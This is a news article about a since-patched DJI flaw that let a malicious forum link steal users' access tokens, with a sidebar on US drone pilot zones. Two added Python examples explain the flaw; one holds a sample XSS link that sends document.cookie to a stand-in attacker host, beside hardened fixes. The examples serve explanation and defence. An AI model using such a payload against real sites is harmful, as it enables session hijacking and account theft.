Was YOUR drone hacked? Flaw in DJI website exposed user data and gave hackers access to live feeds

  • Check Point security researchers found a flaw in DJI's cloud infrastructure
  • It allowed hackers to take over users' accounts and access private data like drone logs with location data, maps, account information and photos or videos
  • Vulnerability was triggered by a malicious link shared by hackers on DJI's forum
  • DJI became aware of the vulnerability in March and has since patched the flaw 

A worrying vulnerability in DJI's cloud infrastructure gave hackers complete access to a user's account without the user realising it.

Security researchers from Check Point in March discovered a flaw in DJI's cloud infrastructure that allowed attackers to take over users' accounts and access private data like drone logs with location data, maps, account information and photos or videos taken during flight. 

However, DJI said it patched the vulnerability in September. 

A worrying vulnerability in DJI's cloud infrastructure gave hackers complete access to a user's account. DJI said it patched the flaw in September

WHAT INFORMATION DID HACKERS HAVE ACCESS TO? 

  • Account credentials, store information, forum data 
  • Cloud-synced flight logs, photos and videos during drone flights 
  • A live camera view and map view during drone flights   

Users fell prey to the attack by clicking on a malicious link shared through DJI Forum, an online forum the firm runs for user discussions about its products. 

Any user who clicked on a 'specially-planted malicious link,' could have had his or her login information stolen, giving the hacker access to cloud data, account information, store, forum and other data. 

It also gave them access to user data from FlightHub, DJI's fleet management system that stores live feed footage. 

The vulnerability stemmed from attackers abusing authentication tokens, which let users move between various DJI sites without having to sign in every time. Anyone holding a copy of such a token could present it in place of the real user.

Hackers took advantage of this feature in Facebook's most recent data breach in September, which resulted in 50 million user accounts being compromised. 

'This is a very deep vulnerability,' Oded Vanunu, head of products vulnerability research at Check Point, told WIRED.

'We're drone fans and fans of DJI, but we want to bring awareness about account takeover vulnerabilities in big vendors' systems. 

The vulnerability stemmed from attackers abusing authentication tokens, which let users move between various DJI sites without having to sign in every time

'In order to let users access different services without having to enter a username and password all the time, companies use one-time authentication to make a user token that's valid across everything. 

'But that means we're living in an era where a targeted attack can become an extensive compromise,' Vanunu added. 
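The design point Vanunu describes, a single token honoured by every service versus one bound to the service it was issued for, as an added illustration that is not DJI's or Check Point's code. The key, the claim names, the two service names 'forum' and 'flighthub' and the 15-minute lifetime are all assumptions for the demo; the token format is a minimal HMAC-signed JSON body, not whatever DJI actually used.

```python
import base64
import hashlib
import hmac
import json

# Placeholder key for the demo; a real deployment uses a managed secret.
SECRET = b"constructed-demo-secret"


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_token(user: str, audience: str, issued_at: int, ttl: int = 900) -> str:
    """Mint a token after a full login. The 'mfa' claim records that the second
    factor was already satisfied, which is exactly why a stolen token never
    triggers another 2FA prompt."""
    claims = {"sub": user, "aud": audience, "iat": issued_at,
              "exp": issued_at + ttl, "mfa": True}
    body = _b64(json.dumps(claims, sort_keys=True).encode())
    sig = _b64(hmac.new(SECRET, body.encode(), hashlib.sha256).digest())
    return f"{body}.{sig}"


def _claims_if_signed(token: str):
    """Return the claims only if the signature verifies; None otherwise."""
    body, _, sig = token.partition(".")
    expected = _b64(hmac.new(SECRET, body.encode(), hashlib.sha256).digest())
    if not hmac.compare_digest(sig, expected):
        return None
    return json.loads(_unb64(body))


def verify_vulnerable(token: str, service: str, now: int):
    """'Valid across everything': any signed, unexpired token is accepted by any
    service, so a token that leaked from the forum also unlocks flight logs."""
    claims = _claims_if_signed(token)
    if claims is None or now >= claims["exp"]:
        return None
    return claims["sub"]


def verify_hardened(token: str, service: str, now: int):
    """Audience-bound: the token must name the service that is checking it,
    which limits a single leaked token to one site."""
    claims = _claims_if_signed(token)
    if claims is None or now >= claims["exp"] or claims["aud"] != service:
        return None
    return claims["sub"]


if __name__ == "__main__":
    t0 = 1_700_000_000
    stolen = issue_token("pilot42", "forum", t0)
    print("vulnerable flighthub check:", verify_vulnerable(stolen, "flighthub", t0 + 10))
    print("hardened flighthub check:  ", verify_hardened(stolen, "flighthub", t0 + 10))
```

Scoping is only one mitigation: a short lifetime and revocation on logout shrink the window further, and none of this helps unless the token is also kept out of reach of page scripts in the first place.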

DJI said Check Point reported the flaw through its bug bounty program and the firm has since thoroughly examined its software and hardware to make sure the attack can't be replicated. 

Ultimately, DJI engineers marked the vulnerability as 'high risk - low probability,' because it would be hard to carry out in real life.

'This is because the vulnerability required a complicated set of preconditions to be successfully exploited: The user would have to be logged into their DJI account while clicking on a specially-planted malicious link in the DJI Forum,' a DJI spokesperson said in a statement. 

Hackers were able to take over users' accounts and access private data like drone logs with location data, maps (pictured), account information and photos or videos taken during flight

It also gave them access to user data from FlightHub, DJI's fleet management system that stores live feed footage. The vulnerability stemmed from users clicking on a malicious forum link

'DJI engineers efficiently and effectively patched this vulnerability after being notified by Check Point Research. There is no evidence it was ever exploited.' 

Check Point detailed how attackers were able to gain access to users' accounts. The link posted in the forums included an extra chunk of software code.

When users clicked on it, it silently triggered a script to run in the background, collecting 'cookies' that contained the users' access tokens. 

Because a token is accepted as proof that the login, including any second factor, has already been completed, replaying the stolen tokens let hackers bypass extra security layers such as two-factor authentication without triggering a new prompt, meaning that users wouldn't know their account had been compromised.
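The mechanism described above, a link whose extra code runs in the victim's browser and reads the cookies holding their tokens, as an added example rather than Check Point's proof of concept or DJI's code. The page does not say how the forum executed the code; the example assumes the common case of a search term reflected into the page unescaped (reflected XSS). The hostnames, the 'q' parameter and the cookie name are assumptions. It shows the vulnerable rendering and cookie beside the hardened versions.

```python
import html
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, urlsplit

# Constructed sample link (hypothetical hosts): the search term carries a
# script that ships document.cookie to an attacker-controlled host.
MALICIOUS_LINK = (
    "https://forum.example.test/search?q="
    "%3Cscript%3Enew%20Image().src%3D%22https%3A%2F%2Fattacker.test%2Fc%3F%22"
    "%2Bdocument.cookie%3C%2Fscript%3E"
)


def search_term(url: str) -> str:
    """Pull the q= parameter out of a link the way a forum search page would."""
    return parse_qs(urlsplit(url).query).get("q", [""])[0]


def render_vulnerable(url: str) -> str:
    """Reflects the term into HTML unescaped, so the script in the link runs."""
    return f"<h1>Results for {search_term(url)}</h1>"


def render_hardened(url: str) -> str:
    """Escapes the term, so the browser shows the text instead of executing it."""
    return f"<h1>Results for {html.escape(search_term(url), quote=True)}</h1>"


def executes_script(rendered: str) -> bool:
    """Crude check: does a raw <script> tag survive into the page?"""
    return "<script" in rendered.lower()


def session_cookie_vulnerable(token: str) -> str:
    """Set-Cookie value with no attributes: readable by any script on the page."""
    jar = SimpleCookie()
    jar["session"] = token
    return jar["session"].OutputString()


def session_cookie_hardened(token: str) -> str:
    """HttpOnly keeps document.cookie from exposing the token even when a
    script does run; Secure and SameSite limit where the browser sends it."""
    jar = SimpleCookie()
    jar["session"] = token
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = True
    jar["session"]["samesite"] = "Lax"   # needs Python 3.8+
    jar["session"]["path"] = "/"
    return jar["session"].OutputString()


def readable_from_script(set_cookie_value: str) -> bool:
    """True if document.cookie would expose this cookie (no HttpOnly flag)."""
    attrs = {part.strip().lower() for part in set_cookie_value.split(";")[1:]}
    return "httponly" not in attrs


if __name__ == "__main__":
    print(render_vulnerable(MALICIOUS_LINK))
    print(render_hardened(MALICIOUS_LINK))
    print(session_cookie_vulnerable("tok123"))
    print(session_cookie_hardened("tok123"))
```

Both fixes matter on their own: output escaping stops this particular payload, while HttpOnly means a script that does slip through some other route still cannot read the token, which is the layer that would have kept a leaked link from turning into account takeover.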

'This case was alarming because drones have a lot of private information and this was something that could be taken easily,' Vanunu told Wired.

'Giant platforms need to be more careful about account takeovers.'  

WHAT IS THE US GOVERNMENT DOING TO IMPROVE DRONE TECHNOLOGY?

President Donald Trump signed a directive in 2017 to establish the 'innovation zones' that allow exemptions to some drone regulations, such as flying over people, nighttime flights and flights where the aircraft can't be seen by the operator. 

States, communities and tribes selected to participate would devise their own trial programs in partnership with government and industry drone users.

'Data gathered from these pilot projects will form the basis of a new regulatory framework to safely integrate drones into our national airspace,' US Secretary of Transportation Elaine Chao said in a statement.

Ms Chao, who called the rapidly developing drone industry the biggest development since the jet age, said about 150 applications were received.

Ten sites have been included in the Federal Aviation Administration's Unmanned Aircraft Systems Integration Pilot Program. 

Selected were the Choctaw Nation of Oklahoma; the cities of San Diego, California, and Reno, Nevada; state transportation departments in North Dakota, North Carolina and Kansas; University of Alaska-Fairbanks; the Center for Innovative Technology in Virginia; Memphis-Shelby County Airport Authority in Memphis, Tennessee; and the Lee County Mosquito Control District in Fort Myers, Florida.

North Dakota lieutenant governor Brent Sanford said the program will spur more commercial investment and 'allow us to explore new uses for unmanned aircraft.'

He envisioned drones helping with oil field, flood and weather monitoring, and 'finding missing persons.'

The unmanned aircraft industry has pushed for relaxed restrictions, and the Trump administration has said current regulations have limited drone use, forcing companies to test overseas.

Steven Bradbury, a lawyer for the federal Transportation Department, said drones have caused some 'apprehension' with the public but one of the initiative's biggest goals will be increased 'community awareness and acceptance' of unmanned aircraft.

Mr Bradbury said there is no direct federal funding for the test program.